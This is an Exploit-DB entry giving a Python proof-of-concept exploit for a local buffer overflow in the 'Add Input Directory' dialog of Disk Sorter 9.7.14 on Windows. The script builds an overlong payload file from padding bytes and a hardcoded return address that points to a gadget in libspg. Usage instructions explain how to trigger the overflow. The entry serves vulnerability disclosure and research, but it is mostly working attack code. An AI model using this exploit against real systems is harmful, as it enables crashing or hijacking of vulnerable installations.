Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow

EDB-ID: 42112
Author: n3ckD_
Published: 2017-06-02
CVE: N/A
Type: Dos
Platform: Windows
Vulnerable App: Download Vulnerable Application 

  
 ###################################### 
 #	Exploit Title:		DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC 
 # 	Date: 				25 May 2017 
 # 	Exploit Author: 	n3ckD_ 
 #	Vendor Homepage:	http://www.disksorter.com/ 
 #	Software Link:		http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe 
 #	Version:			Disk Sorter v9.7.14 (32-Bit) 
 #	Tested on:			Windows 7 Enterprise SP1 (Build 7601) 
 #	Usage:				Run the exploit, copy the text of the poc.txt into the 'Inputs -> Add Input Directory' dialog 
 ###################################### 
  
 print "DiskSorter v9.7.14 (32-Bit) - Input Directory Local Buffer Overflow - PoC" 
 print "Copy the text of poc.txt into the 'Inputs -> Add Input Directory' dialog" 
  
 # in libspg:.text 
 # 10147C1C   58               POP EAX 
 # 10147C1D   C3               RETN 
 ret = "\x1c\x7c\x14\x10" 
  
 nops = "\x47\x4F"*24 
 buf = nops + "A"*4048 + ret + "MAGIC" + "\n" 
  
 f = open("poc.txt","w") 
 f.write(buf) 
 f.close()

Source: www.exploit-db.com
Related Posts